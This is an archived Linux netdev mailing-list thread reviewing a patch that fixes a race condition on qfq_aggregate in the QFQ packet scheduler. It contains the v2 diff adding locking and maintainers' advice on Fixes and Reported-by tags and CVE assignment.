> that it's unusual to use sch_tree_lock for aggregation. What do you
> think about applying RCU locks on agg pointers and using
> rcu_dereference_bh?

That requires more efforts, therefore should go to -net-next.

If you have time, you are welcome to work on this and send out a patch
for -net-next.

Thanks!

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-07 17:58                 ` Jakub Kicinski
@ 2025-07-07 23:42                   ` Xiang Mei
  2025-07-08  0:20                     ` Jakub Kicinski
  0 siblings, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-07-07 23:42 UTC (permalink / raw)
  To: Jakub Kicinski; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Mon, Jul 07, 2025 at 10:58:33AM -0700, Jakub Kicinski wrote:
> On Sat,  5 Jul 2025 15:39:58 -0700 Xiang Mei wrote:
> > A race condition can occur when 'agg' is modified in qfq_change_agg
> > (called during qfq_enqueue) while other threads access it
> > concurrently. For example, qfq_dump_class may trigger a NULL
> > dereference, and qfq_delete_class may cause a use-after-free.
> 
> Please don't post patches in reply to threads.

Thanks for the reminder. I'll remember it.
> Add a link to the thread using the Link: marker instead.
> You're also missing a Fixes tag here.

Also, thanks for the "Fixes" tag suggestion.
I read some documents introducing the Fixes tag, but I find it 
hard to find a Fixes commit since it's a design issue 
(lack of lock implementation on agg).

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-07 18:03                 ` Cong Wang
@ 2025-07-08  0:05                   ` Xiang Mei
  2025-07-08  3:18                     ` Willy Tarreau
  2025-07-09 18:06                   ` [PATCH v2] " Xiang Mei
  1 sibling, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-07-08  0:05 UTC (permalink / raw)
  To: Cong Wang; +Cc: netdev, gregkh, jhs, jiri, security

On Mon, Jul 07, 2025 at 11:03:50AM -0700, Cong Wang wrote:
> On Sat, Jul 05, 2025 at 03:39:58PM -0700, Xiang Mei wrote:
> > A race condition can occur when 'agg' is modified in qfq_change_agg
> > (called during qfq_enqueue) while other threads access it
> > concurrently. For example, qfq_dump_class may trigger a NULL
> > dereference, and qfq_delete_class may cause a use-after-free.
> > 
> > This patch addresses the issue by:
> > 
> > 1. Moved qfq_destroy_class into the critical section.
> > 
> > 2. Added sch_tree_lock protection to qfq_dump_class and
> > qfq_dump_class_stats.
> > 
> > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> 
> Although holding sch_tree_lock() for control path is generally not
> elegant, this is clearly not your fault, the current code is already so.
> Converting to RCU requires more efforts, so it should be deferred to
> long term (net-next).
> 
> So as a bug fix, this patch is okay.

Appreciate your code review and guides for the recent two qfq patches.
I'll try to provide a RCU implementation on RCU after I triage other found 
 bugs.

> 
> Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>
> 
> (I assume you tested it with all tdc selftests.)

The patched version passed the tc-testing and my pocs can't trigger the 
bug after patching.

> 
> Thanks!

I have two more questions:

1) Is the patch provider the person who usually adds the "Reported-by" tag?

2) Am I allowed to request a CVE number for this race condition bug?

Triggering this race condition requires "unprivileged user namespaces"
(net_admin) and the bug can lead to privilege escaping 
(refcnt issue -> UAF).

Thanks,
Xiang

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-07 23:42                   ` Xiang Mei
@ 2025-07-08  0:20                     ` Jakub Kicinski
  0 siblings, 0 replies; 26+ messages in thread
From: Jakub Kicinski @ 2025-07-08  0:20 UTC (permalink / raw)
  To: Xiang Mei; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Mon, 7 Jul 2025 16:42:42 -0700 Xiang Mei wrote:
> I read some documents introducing the Fixes tag, but I find it 
> hard to find a Fixes commit since it's a design issue 
> (lack of lock implementation on agg).

Provide the most accurate tag you can find. Often, for old code,
it's the first tag in the commit history -- 1da177e4c3f4

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-08  0:05                   ` Xiang Mei
@ 2025-07-08  3:18                     ` Willy Tarreau
  2025-07-09 18:08                       ` Xiang Mei
  0 siblings, 1 reply; 26+ messages in thread
From: Willy Tarreau @ 2025-07-08  3:18 UTC (permalink / raw)
  To: Xiang Mei; +Cc: Cong Wang, netdev, gregkh, jhs, jiri, security

On Mon, Jul 07, 2025 at 05:05:33PM -0700, Xiang Mei wrote:
> I have two more questions:
> 
> 1) Is the patch provider the person who usually adds the "Reported-by" tag?

Yes, usually when one person authors a patch to fix a problem reported
by someone else, a Reported-by tag is added to credit that reporter.
When it's the same person as the one who authors the patch, it's not
needed.

> 2) Am I allowed to request a CVE number for this race condition bug?

No, this will happen automatically once the fix is considered for
backporting by the stable team, and the cve team decides which fixes
need a CVE. The process is described here: Documentation/process/cve.rst.

Regards,
Willy

^ permalink raw reply	[flat|nested] 26+ messages in thread

* [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-07 18:03                 ` Cong Wang
  2025-07-08  0:05                   ` Xiang Mei
@ 2025-07-09 18:06                   ` Xiang Mei
  2025-07-09 20:19                     ` Jakub Kicinski
  1 sibling, 1 reply; 26+ messages in thread
From: Xiang Mei @ 2025-07-09 18:06 UTC (permalink / raw)
  To: xiyou.wangcong; +Cc: netdev, gregkh, jhs, jiri, security, Xiang Mei

A race condition can occur when 'agg' is modified in qfq_change_agg
(called during qfq_enqueue) while other threads access it
concurrently. For example, qfq_dump_class may trigger a NULL
dereference, and qfq_delete_class may cause a use-after-free.

This patch addresses the issue by:

1. Moved qfq_destroy_class into the critical section.

2. Added sch_tree_lock protection to qfq_dump_class and
qfq_dump_class_stats.

Reported-by: Xiang Mei <xmei5@asu.edu>
Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
v2: Add Reported-by and Fixes tag 
v1: Apply sch_tree_lock to avoid race conditions on qfq_aggregate.

 net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
 1 file changed, 21 insertions(+), 9 deletions(-)

diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
index 5e557b960..a2b321fec 100644
--- a/net/sched/sch_qfq.c
+++ b/net/sched/sch_qfq.c
@@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	bool existing = false;
 	struct nlattr *tb[TCA_QFQ_MAX + 1];
 	struct qfq_aggregate *new_agg = NULL;
-	u32 weight, lmax, inv_w;
+	u32 weight, lmax, inv_w, old_weight, old_lmax;
 	int err;
 	int delta_w;
 
@@ -446,12 +446,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
 	inv_w = ONE_FP / weight;
 	weight = ONE_FP / inv_w;
 
-	if (cl != NULL &&
-	    lmax == cl->agg->lmax &&
-	    weight == cl->agg->class_weight)
-		return 0; /* nothing to change */
+	if (cl != NULL) {
+		sch_tree_lock(sch);
+		old_weight = cl->agg->class_weight;
+		old_lmax   = cl->agg->lmax;
+		sch_tree_unlock(sch);
+		if (lmax == old_lmax && weight == old_weight)
+			return 0; /* nothing to change */
+	}
 
-	delta_w = weight - (cl ? cl->agg->class_weight : 0);
+	delta_w = weight - (cl ? old_weight : 0);
 
 	if (q->wsum + delta_w > QFQ_MAX_WSUM) {
 		NL_SET_ERR_MSG_FMT_MOD(extack,
@@ -558,10 +562,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
 
 	qdisc_purge_queue(cl->qdisc);
 	qdisc_class_hash_remove(&q->clhash, &cl->common);
+	qfq_destroy_class(sch, cl);
 
 	sch_tree_unlock(sch);
 
-	qfq_destroy_class(sch, cl);
 	return 0;
 }
 
@@ -628,6 +632,7 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 {
 	struct qfq_class *cl = (struct qfq_class *)arg;
 	struct nlattr *nest;
+	u32 class_weight, lmax;
 
 	tcm->tcm_parent	= TC_H_ROOT;
 	tcm->tcm_handle	= cl->common.classid;
@@ -636,8 +641,13 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
 	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
 	if (nest == NULL)
 		goto nla_put_failure;
-	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
-	    nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
+
+	sch_tree_lock(sch);
+	class_weight	= cl->agg->class_weight;
+	lmax		= cl->agg->lmax;
+	sch_tree_unlock(sch);
+	if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
+	    nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
 		goto nla_put_failure;
 	return nla_nest_end(skb, nest);
 
@@ -654,8 +664,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
 
 	memset(&xstats, 0, sizeof(xstats));
 
+	sch_tree_lock(sch);
 	xstats.weight = cl->agg->class_weight;
 	xstats.lmax = cl->agg->lmax;
+	sch_tree_unlock(sch);
 
 	if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
 	    gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 26+ messages in thread

* Re: [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-08  3:18                     ` Willy Tarreau
@ 2025-07-09 18:08                       ` Xiang Mei
  0 siblings, 0 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-09 18:08 UTC (permalink / raw)
  To: Willy Tarreau, Jakub Kicinski
  Cc: Cong Wang, netdev, gregkh, jhs, jiri, security

Thanks for the explanations.
v2 is sent with Reported-by and Fixes tags.


On Mon, Jul 7, 2025 at 8:18 PM Willy Tarreau <w@1wt.eu> wrote:
>
> On Mon, Jul 07, 2025 at 05:05:33PM -0700, Xiang Mei wrote:
> > I have two more questions:
> >
> > 1) Is the patch provider the person who usually adds the "Reported-by" tag?
>
> Yes, usually when one person authors a patch to fix a problem reported
> by someone else, a Reported-by tag is added to credit that reporter.
> When it's the same person as the one who authors the patch, it's not
> needed.
>
> > 2) Am I allowed to request a CVE number for this race condition bug?
>
> No, this will happen automatically once the fix is considered for
> backporting by the stable team, and the cve team decides which fixes
> need a CVE. The process is described here: Documentation/process/cve.rst.
>
> Regards,
> Willy

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-09 18:06                   ` [PATCH v2] " Xiang Mei
@ 2025-07-09 20:19                     ` Jakub Kicinski
  2025-07-09 21:41                       ` Xiang Mei
  0 siblings, 1 reply; 26+ messages in thread
From: Jakub Kicinski @ 2025-07-09 20:19 UTC (permalink / raw)
  To: Xiang Mei; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> Signed-off-by: Xiang Mei <xmei5@asu.edu>

Reported-by is for cases where the bug is reported by someone else than
the author. And please do *not* send the patches as a reply in a thread.
I already asked you not to do it once.
-- 
pw-bot: cr

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-09 20:19                     ` Jakub Kicinski
@ 2025-07-09 21:41                       ` Xiang Mei
  2025-07-09 21:54                         ` Jakub Kicinski
  2025-07-10 21:18                         ` Cong Wang
  0 siblings, 2 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-09 21:41 UTC (permalink / raw)
  To: Jakub Kicinski; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Wed, Jul 09, 2025 at 01:19:20PM -0700, Jakub Kicinski wrote:
> On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> 
> Reported-by is for cases where the bug is reported by someone else than

This bug's fixing is a little special since I am both the person who reported 
it and the patch author. I may need a "Reported-by" tag mentioning me since I 
exploited this bug in Google's bug bounty program (kerneCTF) and they will 
verify the Reported-by tag to make sure I am the person found the bug.

> the author. And please do *not* send the patches as a reply in a thread.
> I already asked you not to do it once.

I am so sorry that I misunderstood it. Now it's clear, we should always 
not use "-in-reply-to".

> -- 
> pw-bot: cr

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-09 21:41                       ` Xiang Mei
@ 2025-07-09 21:54                         ` Jakub Kicinski
  2025-07-10 10:06                           ` Xiang Mei
  2025-07-10 21:18                         ` Cong Wang
  1 sibling, 1 reply; 26+ messages in thread
From: Jakub Kicinski @ 2025-07-09 21:54 UTC (permalink / raw)
  To: Xiang Mei; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Wed, 9 Jul 2025 14:41:29 -0700 Xiang Mei wrote:
> On Wed, Jul 09, 2025 at 01:19:20PM -0700, Jakub Kicinski wrote:
> > On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:  
> > > Reported-by: Xiang Mei <xmei5@asu.edu>
> > > Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> > > Signed-off-by: Xiang Mei <xmei5@asu.edu>  
> > 
> > Reported-by is for cases where the bug is reported by someone else than  
> 
> This bug's fixing is a little special since I am both the person who reported 
> it and the patch author. I may need a "Reported-by" tag mentioning me since I 
> exploited this bug in Google's bug bounty program (kerneCTF) and they will 
> verify the Reported-by tag to make sure I am the person found the bug.

I'd be surprised if Google folks didn't understand kernel tags.
Please drop the tag and if you have any trouble you can refer
them to this thread (or ping me).

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-09 21:54                         ` Jakub Kicinski
@ 2025-07-10 10:06                           ` Xiang Mei
  0 siblings, 0 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-10 10:06 UTC (permalink / raw)
  To: Jakub Kicinski; +Cc: xiyou.wangcong, netdev, gregkh, jhs, jiri, security

On Wed, Jul 09, 2025 at 02:54:58PM -0700, Jakub Kicinski wrote:
> On Wed, 9 Jul 2025 14:41:29 -0700 Xiang Mei wrote:
> > On Wed, Jul 09, 2025 at 01:19:20PM -0700, Jakub Kicinski wrote:
> > > On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:  
> > > > Reported-by: Xiang Mei <xmei5@asu.edu>
> > > > Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> > > > Signed-off-by: Xiang Mei <xmei5@asu.edu>  
> > > 
> > > Reported-by is for cases where the bug is reported by someone else than  
> > 
> > This bug's fixing is a little special since I am both the person who reported 
> > it and the patch author. I may need a "Reported-by" tag mentioning me since I 
> > exploited this bug in Google's bug bounty program (kerneCTF) and they will 
> > verify the Reported-by tag to make sure I am the person found the bug.
> 
> I'd be surprised if Google folks didn't understand kernel tags.
> Please drop the tag and if you have any trouble you can refer
> them to this thread (or ping me).
Thanks for the endorsments. I'll remove the Reported-by tag.

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-09 21:41                       ` Xiang Mei
  2025-07-09 21:54                         ` Jakub Kicinski
@ 2025-07-10 21:18                         ` Cong Wang
  2025-07-10 22:45                           ` Xiang Mei
  1 sibling, 1 reply; 26+ messages in thread
From: Cong Wang @ 2025-07-10 21:18 UTC (permalink / raw)
  To: Xiang Mei; +Cc: Jakub Kicinski, netdev, gregkh, jhs, jiri, security

On Wed, Jul 09, 2025 at 02:41:29PM -0700, Xiang Mei wrote:
> On Wed, Jul 09, 2025 at 01:19:20PM -0700, Jakub Kicinski wrote:
> > On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:
> > > Reported-by: Xiang Mei <xmei5@asu.edu>
> > > Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> > > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> > 
> > Reported-by is for cases where the bug is reported by someone else than
> 
> This bug's fixing is a little special since I am both the person who reported 
> it and the patch author. I may need a "Reported-by" tag mentioning me since I 
> exploited this bug in Google's bug bounty program (kerneCTF) and they will 
> verify the Reported-by tag to make sure I am the person found the bug.

Like others explained, "Reported-by" is for giving credits to the
reporter. Since you are both the author and reporter in this case, you already
have all the credits. They should understand this and credit you
properly. (Please do let us know if they don't, I am happy to help.)

Thanks for keeping updating your patch!

^ permalink raw reply	[flat|nested] 26+ messages in thread

* Re: [PATCH v2] net/sched: sch_qfq: Fix race condition on qfq_aggregate
  2025-07-10 21:18                         ` Cong Wang
@ 2025-07-10 22:45                           ` Xiang Mei
  0 siblings, 0 replies; 26+ messages in thread
From: Xiang Mei @ 2025-07-10 22:45 UTC (permalink / raw)
  To: Cong Wang; +Cc: Jakub Kicinski, netdev, gregkh, jhs, jiri, security

On Thu, Jul 10, 2025 at 02:18:36PM -0700, Cong Wang wrote:
> On Wed, Jul 09, 2025 at 02:41:29PM -0700, Xiang Mei wrote:
> > On Wed, Jul 09, 2025 at 01:19:20PM -0700, Jakub Kicinski wrote:
> > > On Wed,  9 Jul 2025 11:06:22 -0700 Xiang Mei wrote:
> > > > Reported-by: Xiang Mei <xmei5@asu.edu>
> > > > Fixes: 462dbc9101ac ("pkt_sched: QFQ Plus: fair-queueing service at DRR cost")
> > > > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> > > 
> > > Reported-by is for cases where the bug is reported by someone else than
> > 
> > This bug's fixing is a little special since I am both the person who reported 
> > it and the patch author. I may need a "Reported-by" tag mentioning me since I 
> > exploited this bug in Google's bug bounty program (kerneCTF) and they will 
> > verify the Reported-by tag to make sure I am the person found the bug.
> 
> Like others explained, "Reported-by" is for giving credits to the
> reporter. Since you are both the author and reporter in this case, you already
> have all the credits. They should understand this and credit you
> properly. (Please do let us know if they don't, I am happy to help.)
> 
> Thanks for keeping updating your patch!

Thank you, Jakub, and Willy for for the detailed explanations and patience.
I'll let my future bug reports smoother.

Cheers!

^ permalink raw reply	[flat|nested] 26+ messages in thread

end of thread, other threads:[~2025-07-10 22:45 UTC | newest]

Thread overview: 26+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
     [not found] <CAPpSM+SKOj9U8g_QsGp8M45dtEwvX4B_xdd7C0mP9pYu1b4mzA@mail.gmail.com>
2025-06-29 14:28 ` sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c) Jamal Hadi Salim
2025-06-30  3:11   ` Xiang Mei
2025-06-30 11:36     ` Jamal Hadi Salim
2025-06-30 18:49       ` Xiang Mei
2025-06-30 23:09         ` Cong Wang
2025-07-01  2:52           ` Xiang Mei
2025-07-02 19:41           ` Xiang Mei
2025-07-04  4:55             ` Cong Wang
2025-07-05 22:39               ` [PATCH v1] net/sched: sch_qfq: Fix race condition on qfq_aggregate Xiang Mei
2025-07-05 22:49                 ` Xiang Mei
2025-07-07 18:05                   ` Cong Wang
2025-07-07 17:58                 ` Jakub Kicinski
2025-07-07 23:42                   ` Xiang Mei
2025-07-08  0:20                     ` Jakub Kicinski
2025-07-07 18:03                 ` Cong Wang
2025-07-08  0:05                   ` Xiang Mei
2025-07-08  3:18                     ` Willy Tarreau
2025-07-09 18:08                       ` Xiang Mei
2025-07-09 18:06                   ` [PATCH v2] " Xiang Mei
2025-07-09 20:19                     ` Jakub Kicinski
2025-07-09 21:41                       ` Xiang Mei
2025-07-09 21:54                         ` Jakub Kicinski
2025-07-10 10:06                           ` Xiang Mei
2025-07-10 21:18                         ` Cong Wang
2025-07-10 22:45                           ` Xiang Mei
2025-07-01 14:02         ` sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c) Jamal Hadi Salim

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).